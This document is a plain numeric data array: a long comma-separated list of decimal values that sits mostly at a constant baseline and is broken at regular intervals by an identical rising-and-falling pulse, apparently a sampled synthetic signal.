-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 